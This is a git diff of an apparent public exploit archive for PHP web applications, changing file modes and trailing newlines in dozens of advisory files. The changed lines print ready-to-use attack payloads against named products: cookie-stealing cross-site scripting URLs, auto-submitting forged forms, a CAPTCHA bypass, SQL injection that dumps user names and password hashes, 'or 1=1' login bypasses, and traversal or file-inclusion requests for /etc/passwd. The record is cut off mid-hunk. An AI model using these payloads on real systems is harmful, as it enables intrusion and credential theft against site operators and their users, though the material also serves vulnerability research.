a/platforms/php/webapps/33367.txt b/platforms/php/webapps/33367.txt old mode 100755 new mode 100644 index f8aaa4317..c8c2f8b22 --- a/platforms/php/webapps/33367.txt +++ b/platforms/php/webapps/33367.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to gain unauthorized access to the affecte FireStats 1.0.2 is vulnerable; other versions may also be affected. -<html> <head> <title>FireStats XSS exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://www.example.com/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1&FS_IN_WORDPRESS=0" method="post"> <input type="hidden" name="action" value="<BODY onload=alert(document.cookie)>" /> </body> </html> \ No newline at end of file +<html> <head> <title>FireStats XSS exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://www.example.com/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1&FS_IN_WORDPRESS=0" method="post"> <input type="hidden" name="action" value="<BODY onload=alert(document.cookie)>" /> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/33368.html b/platforms/php/webapps/33368.html old mode 100755 new mode 100644 index 3341f0f5a..bd88d8281 --- a/platforms/php/webapps/33368.html +++ b/platforms/php/webapps/33368.html @@ -6,4 +6,4 @@ An attacker may leverage these issues to gain unauthorized access to the affecte FireStats 1.0.2 is vulnerable; other versions may also be affected. -<html> <head> <title>FireStats Insuficient Anti-automation exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://www.example.com/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1&FS_IN_WORDPRESS=0" method="post"> <input type="hidden" name="action" value="reclaculateDBCache" /> </body> </html> \ No newline at end of file +<html> <head> <title>FireStats Insuficient Anti-automation exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://www.example.com/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1&FS_IN_WORDPRESS=0" method="post"> <input type="hidden" name="action" value="reclaculateDBCache" /> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/3337.php b/platforms/php/webapps/3337.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33371.txt b/platforms/php/webapps/33371.txt old mode 100755 new mode 100644 index ba061c223..d9e10522e --- a/platforms/php/webapps/33371.txt +++ b/platforms/php/webapps/33371.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to WP-Cumulus 1.23 are vulnerable. -http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file diff --git a/platforms/php/webapps/33372.html b/platforms/php/webapps/33372.html old mode 100755 new mode 100644 index 47008ff1d..adcce7ecd --- a/platforms/php/webapps/33372.html +++ b/platforms/php/webapps/33372.html @@ -6,4 +6,4 @@ Successful exploits may allow attackers to bypass security restrictions and perf CapCC 1.0 is affected; other versions may also be vulnerable. -<html> <head><base href="http://websecurity.com.ua/uploads/2008/CapCC%20CAPTCHA%20bypass.html" /> <title>CapCC CAPTCHA bypass exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://sitewww.example.com/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test"> <input type="hidden" name="email" value="test@www.example.com"> <input type="hidden" name="url" value="http://www.example.com"> <input type="hidden" name="comment" value="Captcha bypass test."> <input type="hidden" name="comment_post_ID" value="1"> <input type="hidden" name="capcc_captchakey" value="EQoenVjf6wemPguoYT6CJwl0O"> <input type="hidden" name="capcc_captcha" value="gthsw"> </form> </body> </html> \ No newline at end of file +<html> <head><base href="http://websecurity.com.ua/uploads/2008/CapCC%20CAPTCHA%20bypass.html" /> <title>CapCC CAPTCHA bypass exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://sitewww.example.com/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test"> <input type="hidden" name="email" value="test@www.example.com"> <input type="hidden" name="url" value="http://www.example.com"> <input type="hidden" name="comment" value="Captcha bypass test."> <input type="hidden" name="comment_post_ID" value="1"> <input type="hidden" name="capcc_captchakey" value="EQoenVjf6wemPguoYT6CJwl0O"> <input type="hidden" name="capcc_captcha" value="gthsw"> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/33373.txt b/platforms/php/webapps/33373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33374.txt b/platforms/php/webapps/33374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33375.txt b/platforms/php/webapps/33375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33377.txt b/platforms/php/webapps/33377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33378.txt b/platforms/php/webapps/33378.txt old mode 100755 new mode 100644 index 9adcc48d2..5d4b20510 --- a/platforms/php/webapps/33378.txt +++ b/platforms/php/webapps/33378.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Unspecified versions of Joomla! 1.5.x prior to 1.5.12 are vulnerable. -http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3338.php b/platforms/php/webapps/3338.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33380.txt b/platforms/php/webapps/33380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33381.txt b/platforms/php/webapps/33381.txt old mode 100755 new mode 100644 index f2395b822..c822e9a55 --- a/platforms/php/webapps/33381.txt +++ b/platforms/php/webapps/33381.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Content 0.5 is affected; other versions may also be vulnerable. -http://www.example.com/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11-- \ No newline at end of file +http://www.example.com/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11-- \ No newline at end of file diff --git a/platforms/php/webapps/33382.txt b/platforms/php/webapps/33382.txt old mode 100755 new mode 100644 index ffc67f7d9..94ed7d1c9 --- a/platforms/php/webapps/33382.txt +++ b/platforms/php/webapps/33382.txt @@ -8,4 +8,4 @@ SmartMedia 0.85 Beta is affected; other versions may also be vulnerable. The following example URI is available: -http://www.example.com/modules/smartmedia/folder.php?categoryid=1>"><ScRiPt>alert(0);</ScRiPt>&folderid=1&start=0 \ No newline at end of file +http://www.example.com/modules/smartmedia/folder.php?categoryid=1>"><ScRiPt>alert(0);</ScRiPt>&folderid=1&start=0 \ No newline at end of file diff --git a/platforms/php/webapps/33383.txt b/platforms/php/webapps/33383.txt old mode 100755 new mode 100644 index 7ad532096..c0ca5b246 --- a/platforms/php/webapps/33383.txt +++ b/platforms/php/webapps/33383.txt @@ -4,4 +4,4 @@ Elxis is prone to a directory-traversal vulnerability because it fails to suffic Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/includes/feedcreator.class.php?filename=../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/includes/feedcreator.class.php?filename=../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/33385.txt b/platforms/php/webapps/33385.txt old mode 100755 new mode 100644 index 75469c28c..9ad3552a1 --- a/platforms/php/webapps/33385.txt +++ b/platforms/php/webapps/33385.txt @@ -23,4 +23,4 @@ http://www.example.com/index.php?action=translate&cat=1&id=1&srclang=en"><script http://www.example.com/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en http://www.example.com/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en http://www.example.com/index.php?action=add&question=1&cat=1"><script>alert(1)</script> -http://www.example.com/index.php?action=add&question=1"><script>alert(1)</script>&cat=1 \ No newline at end of file +http://www.example.com/index.php?action=add&question=1"><script>alert(1)</script>&cat=1 \ No newline at end of file diff --git a/platforms/php/webapps/33389.txt b/platforms/php/webapps/33389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33390.txt b/platforms/php/webapps/33390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33391.txt b/platforms/php/webapps/33391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33392.txt b/platforms/php/webapps/33392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33393.txt b/platforms/php/webapps/33393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33394.txt b/platforms/php/webapps/33394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33396.txt b/platforms/php/webapps/33396.txt old mode 100755 new mode 100644 index 5f964d19d..e359fe9b9 --- a/platforms/php/webapps/33396.txt +++ b/platforms/php/webapps/33396.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects ZeeJobsite 3x; other versions may be vulnerable as well. -http://www.example.com/basic_search_result.php?title=<script>alert(/XSS/)</script> \ No newline at end of file +http://www.example.com/basic_search_result.php?title=<script>alert(/XSS/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/33400.txt b/platforms/php/webapps/33400.txt old mode 100755 new mode 100644 index 093c53124..b37f130fb --- a/platforms/php/webapps/33400.txt +++ b/platforms/php/webapps/33400.txt @@ -4,4 +4,4 @@ Ez Cart is prone to is prone to a cross-site scripting vulnerability because it An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?action=showcat&cid=1&sid=[XSS] \ No newline at end of file +http://www.example.com/index.php?action=showcat&cid=1&sid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33401.txt b/platforms/php/webapps/33401.txt old mode 100755 new mode 100644 index 18257fe01..713929810 --- a/platforms/php/webapps/33401.txt +++ b/platforms/php/webapps/33401.txt @@ -9,4 +9,4 @@ Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions ma The following example URI is available: -http://www.example.com/?pa=[XSS] \ No newline at end of file +http://www.example.com/?pa=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33404.txt b/platforms/php/webapps/33404.txt old mode 100755 new mode 100644 index 0060fe05d..fdbf57dba --- a/platforms/php/webapps/33404.txt +++ b/platforms/php/webapps/33404.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example is available: -http://www.example.com/module.php?mod=[XSS] \ No newline at end of file +http://www.example.com/module.php?mod=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33406.txt b/platforms/php/webapps/33406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33407.txt b/platforms/php/webapps/33407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33408.txt b/platforms/php/webapps/33408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33409.txt b/platforms/php/webapps/33409.txt old mode 100755 new mode 100644 index 759485507..eaf899237 --- a/platforms/php/webapps/33409.txt +++ b/platforms/php/webapps/33409.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example is available: Username : X' or ' 1=1 -Password : X' or ' 1=1 \ No newline at end of file +Password : X' or ' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33410.txt b/platforms/php/webapps/33410.txt old mode 100755 new mode 100644 index 4313c278e..fa94629e2 --- a/platforms/php/webapps/33410.txt +++ b/platforms/php/webapps/33410.txt @@ -10,4 +10,4 @@ Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable. The following example input is available: -<script>alert('xss');</script> \ No newline at end of file +<script>alert('xss');</script> \ No newline at end of file diff --git a/platforms/php/webapps/33411.txt b/platforms/php/webapps/33411.txt old mode 100755 new mode 100644 index 1203996f6..9ca3bf9b3 --- a/platforms/php/webapps/33411.txt +++ b/platforms/php/webapps/33411.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br iSupport 1.8 and prior versions are vulnerable. -http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E \ No newline at end of file +http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33412.txt b/platforms/php/webapps/33412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33413.txt b/platforms/php/webapps/33413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33416.txt b/platforms/php/webapps/33416.txt old mode 100755 new mode 100644 index 175ccfc9a..560865c9b --- a/platforms/php/webapps/33416.txt +++ b/platforms/php/webapps/33416.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected. -http://www.example.com/path/?lang=../path/to/malicious_uploaded_code \ No newline at end of file +http://www.example.com/path/?lang=../path/to/malicious_uploaded_code \ No newline at end of file diff --git a/platforms/php/webapps/33417.txt b/platforms/php/webapps/33417.txt old mode 100755 new mode 100644 index bc9dd4df0..12a73b128 --- a/platforms/php/webapps/33417.txt +++ b/platforms/php/webapps/33417.txt @@ -9,4 +9,4 @@ cPanel versions prior to 11.25.0 are affected. http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS -http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO \ No newline at end of file +http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO \ No newline at end of file diff --git a/platforms/php/webapps/33418.txt b/platforms/php/webapps/33418.txt old mode 100755 new mode 100644 index 0c5354fb0..7127f5fd5 --- a/platforms/php/webapps/33418.txt +++ b/platforms/php/webapps/33418.txt @@ -4,4 +4,4 @@ The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/ \ No newline at end of file +http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/ \ No newline at end of file diff --git a/platforms/php/webapps/33419.txt b/platforms/php/webapps/33419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33420.txt b/platforms/php/webapps/33420.txt old mode 100755 new mode 100644 index c4597bfed..4789e0c95 --- a/platforms/php/webapps/33420.txt +++ b/platforms/php/webapps/33420.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and F3Site 2009 is vulnerable; other versions may also be affected. -http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00] \ No newline at end of file +http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00] \ No newline at end of file diff --git a/platforms/php/webapps/33421.txt b/platforms/php/webapps/33421.txt old mode 100755 new mode 100644 index 2494d5fb1..70f0e82e6 --- a/platforms/php/webapps/33421.txt +++ b/platforms/php/webapps/33421.txt @@ -9,4 +9,4 @@ Ampache 3.4.3 is vulnerable; other versions may also be affected. The following data is available: username : x' or ' 1=1 -password : x' or ' 1=1 \ No newline at end of file +password : x' or ' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33422.txt b/platforms/php/webapps/33422.txt old mode 100755 new mode 100644 index 6cd82d4fc..47ba19678 --- a/platforms/php/webapps/33422.txt +++ b/platforms/php/webapps/33422.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow JBC Explorer 7.20 is vulnerable; other versions may also be affected. -http://www.example.com/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)> \ No newline at end of file +http://www.example.com/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)> \ No newline at end of file diff --git a/platforms/php/webapps/33424.txt b/platforms/php/webapps/33424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33435.txt b/platforms/php/webapps/33435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33436.txt b/platforms/php/webapps/33436.txt old mode 100755 new mode 100644 index a8be96230..970179726 --- a/platforms/php/webapps/33436.txt +++ b/platforms/php/webapps/33436.txt @@ -8,4 +8,4 @@ PHP-Calendar 1.1 is vulnerable; other versions may also be affected. http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php -http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd \ No newline at end of file +http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/33437.txt b/platforms/php/webapps/33437.txt old mode 100755 new mode 100644 index 76eaea02a..e3c18e1e7 --- a/platforms/php/webapps/33437.txt +++ b/platforms/php/webapps/33437.txt @@ -8,4 +8,4 @@ PHP-Calendar 1.1 is vulnerable; other versions may also be affected. http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php -http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd \ No newline at end of file +http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/33439.txt b/platforms/php/webapps/33439.txt old mode 100755 new mode 100644 index 12e6130f4..aab92c07f --- a/platforms/php/webapps/33439.txt +++ b/platforms/php/webapps/33439.txt @@ -8,4 +8,4 @@ MyBB 1.4.10 is vulnerable; other versions may be affected as well. http://www.example.com/myps.php?action=donate&username="/> -http://www.example.com/myps.php?action=donate&username=<IMG""">"> \ No newline at end of file +http://www.example.com/myps.php?action=donate&username=<IMG""">"> \ No newline at end of file diff --git a/platforms/php/webapps/33440.txt b/platforms/php/webapps/33440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33441.txt b/platforms/php/webapps/33441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33442.txt b/platforms/php/webapps/33442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33443.txt b/platforms/php/webapps/33443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33445.txt b/platforms/php/webapps/33445.txt old mode 100755 new mode 100644 index 527a83251..fd912681f --- a/platforms/php/webapps/33445.txt +++ b/platforms/php/webapps/33445.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow phpInstantGallery 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/instantgallery/admin.php/>"><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file +http://www.example.com/instantgallery/admin.php/>"><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33446.txt b/platforms/php/webapps/33446.txt old mode 100755 new mode 100644 index fe0118bb8..63dc83557 --- a/platforms/php/webapps/33446.txt +++ b/platforms/php/webapps/33446.txt @@ -9,4 +9,4 @@ The following example URIs are available: http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<script>alert(213771818860)</script> -http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<img+src=http://server/Hack.jpg+onload=alert(213771818860)> \ No newline at end of file +http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<img+src=http://server/Hack.jpg+onload=alert(213771818860)> \ No newline at end of file diff --git a/platforms/php/webapps/33447.php b/platforms/php/webapps/33447.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33448.txt b/platforms/php/webapps/33448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33449.txt b/platforms/php/webapps/33449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33450.txt b/platforms/php/webapps/33450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33451.txt b/platforms/php/webapps/33451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33452.txt b/platforms/php/webapps/33452.txt old mode 100755 new mode 100644 index a58a4091e..bd5845b05 --- a/platforms/php/webapps/33452.txt +++ b/platforms/php/webapps/33452.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Imagevue r16 is vulnerable; other versions may also be affected. -http://www.example.com/upload/admin/upload.php?amount=<img+src=http://127.0.0.1/dot.gif+onload=alert(213771818860)>&path=hacked%20by%20indoushka \ No newline at end of file +http://www.example.com/upload/admin/upload.php?amount=<img+src=http://127.0.0.1/dot.gif+onload=alert(213771818860)>&path=hacked%20by%20indoushka \ No newline at end of file diff --git a/platforms/php/webapps/33456.txt b/platforms/php/webapps/33456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33457.txt b/platforms/php/webapps/33457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33458.txt b/platforms/php/webapps/33458.txt old mode 100755 new mode 100644 index fd3b5e5c4..ff75de66e --- a/platforms/php/webapps/33458.txt +++ b/platforms/php/webapps/33458.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Discuz! 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33459.txt b/platforms/php/webapps/33459.txt old mode 100755 new mode 100644 index 73c794277..ddc405ef8 --- a/platforms/php/webapps/33459.txt +++ b/platforms/php/webapps/33459.txt @@ -9,4 +9,4 @@ DieselPay 1.6 is vulnerable; other versions may also be affected. The following example URIs are available: http://www.example.com/dieselpay/index.php?read=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> -http://www.example.com/dieselpay/index.php?read=../../../../../../../../boot.ini \ No newline at end of file +http://www.example.com/dieselpay/index.php?read=../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/33460.txt b/platforms/php/webapps/33460.txt old mode 100755 new mode 100644 index a0382674a..985406a8d --- a/platforms/php/webapps/33460.txt +++ b/platforms/php/webapps/33460.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Magic News Plus 1.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/>[xss] \ No newline at end of file +http://www.example.com/index.php/>[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33461.txt b/platforms/php/webapps/33461.txt old mode 100755 new mode 100644 index c8895a92d..bf0968b1c --- a/platforms/php/webapps/33461.txt +++ b/platforms/php/webapps/33461.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHPCart 3.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin/search.php?action=submit&order_id=[xss] \ No newline at end of file +http://www.example.com/admin/search.php?action=submit&order_id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33462.txt b/platforms/php/webapps/33462.txt old mode 100755 new mode 100644 index ec8f39f06..4a6cd3b68 --- a/platforms/php/webapps/33462.txt +++ b/platforms/php/webapps/33462.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow VirtuaNews Pro 1.0.4 is vulnerable; other versions may also be affected. -http://www.example.com/upload/admin.php?username=[xss] \ No newline at end of file +http://www.example.com/upload/admin.php?username=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33463.txt b/platforms/php/webapps/33463.txt old mode 100755 new mode 100644 index f7bdbbd3f..3bee78969 --- a/platforms/php/webapps/33463.txt +++ b/platforms/php/webapps/33463.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow VisionGate 1.6 is vulnerable; other versions may also be affected. -http://www.example.com/login.php?url=[xss] \ No newline at end of file +http://www.example.com/login.php?url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33464.txt b/platforms/php/webapps/33464.txt old mode 100755 new mode 100644 index d01ea4a69..006e1f167 --- a/platforms/php/webapps/33464.txt +++ b/platforms/php/webapps/33464.txt @@ -8,4 +8,4 @@ Discuz! 2.0 is vulnerable; other versions may also be affected. http://www.example.com/Discuz/post.php?action=edit&fid=1&tid=17&pid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&page=1 -http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33465.txt b/platforms/php/webapps/33465.txt old mode 100755 new mode 100644 index 310b4d6bb..c32ccd782 --- a/platforms/php/webapps/33465.txt +++ b/platforms/php/webapps/33465.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SLAED CMS 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?name=Recommend&stop=<ScRiPt+src=http://127.0.0.1/xss.js?213771818860></ScRiPt> \ No newline at end of file +http://www.example.com/index.php?name=Recommend&stop=<ScRiPt+src=http://127.0.0.1/xss.js?213771818860></ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33466.txt b/platforms/php/webapps/33466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33467.txt b/platforms/php/webapps/33467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33468.txt b/platforms/php/webapps/33468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33469.txt b/platforms/php/webapps/33469.txt old mode 100755 new mode 100644 index 420dac196..39d6391be --- a/platforms/php/webapps/33469.txt +++ b/platforms/php/webapps/33469.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br LXR Cross Referencer 0.9.5 and 0.9.6 are affected; other versions may also be vulnerable. -http://www.example.com/lxr/ident?i=<script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/lxr/ident?i=<script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/33470.txt b/platforms/php/webapps/33470.txt old mode 100755 new mode 100644 index d0108c534..cd9723a88 --- a/platforms/php/webapps/33470.txt +++ b/platforms/php/webapps/33470.txt @@ -12,4 +12,4 @@ LineWeb 1.0.5 is vulnerable; other versions may also be affected. http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00 http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00 -http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27 \ No newline at end of file +http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27 \ No newline at end of file diff --git a/platforms/php/webapps/33473.txt b/platforms/php/webapps/33473.txt old mode 100755 new mode 100644 index ac28ad9e3..60c2b9c83 --- a/platforms/php/webapps/33473.txt +++ b/platforms/php/webapps/33473.txt @@ -4,4 +4,4 @@ RoundCube Webmail is prone to a cross-site scripting vulnerability because it fa An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123 \ No newline at end of file +http://www.example.com/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123 \ No newline at end of file diff --git a/platforms/php/webapps/33474.txt b/platforms/php/webapps/33474.txt old mode 100755 new mode 100644 index 6d5e97748..1793cef00 --- a/platforms/php/webapps/33474.txt +++ b/platforms/php/webapps/33474.txt @@ -4,4 +4,4 @@ The DM Orders component for Joomla! is prone to an SQL-injection vulnerability b Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 \ No newline at end of file +http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 \ No newline at end of file diff --git a/platforms/php/webapps/33475.txt b/platforms/php/webapps/33475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33477.txt b/platforms/php/webapps/33477.txt old mode 100755 new mode 100644 index 450f6fa12..73c47e003 --- a/platforms/php/webapps/33477.txt +++ 